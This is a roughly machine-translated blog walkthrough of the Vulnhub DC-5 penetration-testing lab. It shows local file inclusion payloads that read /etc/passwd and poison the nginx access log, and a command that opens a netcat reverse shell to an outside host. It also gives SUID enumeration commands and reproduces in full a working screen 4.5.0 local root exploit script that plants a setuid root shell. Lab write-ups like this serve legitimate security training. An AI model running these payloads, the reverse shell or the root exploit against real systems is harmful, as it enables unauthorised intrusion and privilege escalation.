当前位置：网站首页>Vulnhub DC-5

Vulnhub DC-5

2022-06-23 02:29:00 【Part 02】

Description
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

The scarlet letter means that something will change after the page is refreshed , And the ultimate goal is to get root jurisdiction

111 port

80 port

stay welcome The information on the page looks like English, but the lack of letters makes the content difficult to read , And according to the prompt repeatedly refresh and do not see any changes

upper url The display of is what I filled in before , And about the url Guess the file contains , And I want to get root jurisdiction

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=/etc/passwd

and shadow The file still cannot be echoed , But know url yes

linux The default path of the system log file is ：/var/log

and Nginx Server access nginx There are two logs ,access.log and error.log

?file=/var/log/nginx/access.log

?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.37.128 5555

Get interactive shell
python -c "import pty; pty.spawn('/bin/bash')"

root directory

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF

gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
---------》》》
echo "[+] Now we create our /etc/ld.so.preload file..."
③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"             # newline needed

echo "[+] Triggering..."

screen -ls                                                                               # screen itself is setuid, so...
/tmp/rootshell